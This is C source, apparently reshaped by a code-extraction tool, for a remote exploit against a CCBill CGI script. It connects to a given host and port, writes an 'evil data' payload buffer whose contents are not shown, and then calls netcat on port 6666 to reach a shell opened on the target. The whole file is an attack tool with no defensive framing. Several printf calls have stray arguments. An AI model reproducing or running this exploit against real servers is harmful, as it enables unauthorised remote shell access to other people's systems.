
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {int dummy; } ;


 int EXIT_FAILURE ;
 int EXIT_SUCCESS ;
 unsigned short atoi (char*) ;
 int ccbill ;
 int close (int) ;
 int exit (int ) ;
 int net_connect (struct sockaddr_in*,char*,unsigned short,int) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int setenv (char*,char*,int) ;
 int sleep (int) ;
 int strlen (int ) ;
 int system (char*) ;
 int write (int,int ,int ) ;

int
main (int argc, char **argv)
{
 int socket;
 char *TARGET = "TARGET";
 char *server;
 unsigned short int port;
 struct sockaddr_in sa;

 if (argc != 3) {
  system("clear");
  printf ("[CCBILL CGI Remote Exploit By:Knight420]\n"
  "usage: %s <host> <port>\n");
  exit (EXIT_FAILURE);
 }
 setenv (TARGET, argv[1], 1);
 server = argv[1];
 port = atoi (argv[2]);

 socket = net_connect (&sa, server, port, 35);
 if (socket <= 0) {
  perror ("net_connect");
  exit (EXIT_FAILURE);
 }

 write (socket, ccbill, strlen (ccbill));
 sleep (1);
 close (socket);

 printf ("[CCBILL CGI Remote Exploit By:Knight420]\n");
 printf ("[1] evil data sent.\n", server);
 printf ("[2] connecting to shell.\n", server);
 system("nc ${TARGET} 6666 || echo '[-]Exploit failed!'");
 exit (EXIT_SUCCESS);
}
